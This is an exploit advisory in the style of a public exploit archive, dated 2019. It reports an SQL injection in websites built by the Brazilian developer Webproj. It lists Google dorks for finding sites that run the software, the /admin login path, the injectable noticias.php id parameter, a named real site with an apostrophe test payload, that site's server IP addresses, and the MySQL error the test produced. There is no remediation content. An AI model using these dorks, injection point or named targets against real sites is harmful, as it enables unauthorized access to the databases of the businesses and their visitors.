Desenvolvido por Webproj Brazil SQL Injection

1. ######################################################
2.  
3. # Exploit Title : Webproj Brazil SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 17/01/2019
7. # Vendor Homepage : webproj.com.br
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Desenvolvido por Webproj'' site:br
12. intext:''Criação de sites Porto Alegre''
13. intext:''Criação de loja virtual Porto Alegre''
14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
15. Special Elements used in an SQL Command ('SQL Injection') ]
16.  
17. ######################################################
18.  
19. # Admin Panel Login Path :
20. *************************
21. /admin
22.  
23. # SQL Injection Exploit :
24. ***********************
25. /noticias.php?id=[SQL Injection]
26.  
27. ######################################################
28.  
29. # Example Vulnerable Site :
30. *************************
31.  
32. [+] corpoacao.com.br/noticias.php?id=61%27 =>
33.  
34. [ Proof of Concept ] => archive.is/Ym4qv
35.  
36. Note : (191.252.132.249) => There are 18 domains hosted on this server.
37.  
38. Note : (35.211.91.136) => There are 6 domains hosted on this server.
39.  
40. ######################################################
41.  
42. # SQL Database Error :
43. **********************
44. You have an error in your SQL syntax; check the manual that
45. corresponds to your MySQL server version for
46. the right syntax to use near ''61''' at line 1
47.  
48. ######################################################
49.  
50. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
51.  
52. ######################################################